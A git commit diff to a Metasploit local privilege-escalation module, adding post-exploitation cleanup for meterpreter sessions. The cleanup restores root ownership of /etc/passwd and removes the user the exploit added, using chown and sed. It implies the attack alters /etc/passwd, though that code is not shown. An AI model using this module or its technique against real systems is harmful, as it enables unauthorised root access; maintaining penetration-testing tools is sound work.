Support cleanup for meterpreter sessions
parent
74ab02f27b
commit
e158ccb20b
|
@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def on_new_session(session)
|
||||
# Reinstate /etc/passwd ownership
|
||||
if session.type.to_s.eql? 'meterpreter'
|
||||
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
|
||||
end
|
||||
|
||||
# Reinstate /etc/passwd root ownership and remove new user
|
||||
root_owns_passwd = false
|
||||
new_user_removed = false
|
||||
|
||||
if session.type.to_s.eql? 'meterpreter'
|
||||
# Reinstate /etc/passwd root ownership
|
||||
session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
|
||||
|
||||
# Remove new user
|
||||
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
|
||||
|
||||
# Wait for clean up
|
||||
Rex.sleep 5
|
||||
|
||||
# Check root ownership
|
||||
passwd_stat = session.fs.file.stat(@chown_file).stathash
|
||||
if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
|
||||
root_owns_passwd = true
|
||||
end
|
||||
|
||||
# Check for new user in /etc/passwd
|
||||
passwd_contents = session.fs.file.open(@chown_file).read.to_s
|
||||
unless passwd_contents.include? "#{@username}:"
|
||||
new_user_removed = true
|
||||
end
|
||||
elsif session.type.to_s.eql? 'shell'
|
||||
# Reinstate /etc/passwd root ownership
|
||||
session.shell_command_token "chown root:root #{@chown_file}"
|
||||
|
||||
# Remove new user
|
||||
session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
|
||||
passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
|
||||
if passwd.include? @username
|
||||
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
||||
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
|
||||
|
||||
# Check root ownership
|
||||
passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
|
||||
if passwd_owner.to_s.include? 'root'
|
||||
root_owns_passwd = true
|
||||
end
|
||||
|
||||
# Check for new user in /etc/passwd
|
||||
passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
|
||||
unless passwd_user.to_s.include? "#{@username}:"
|
||||
new_user_removed = true
|
||||
end
|
||||
end
|
||||
|
||||
unless root_owns_passwd
|
||||
print_warning "Could not reinstate root ownership of #{@chown_file}"
|
||||
end
|
||||
|
||||
unless new_user_removed
|
||||
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
||||
end
|
||||
rescue => e
|
||||
print_error "Error during cleanup: #{e.message}"
|
||||
ensure
|
||||
super
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue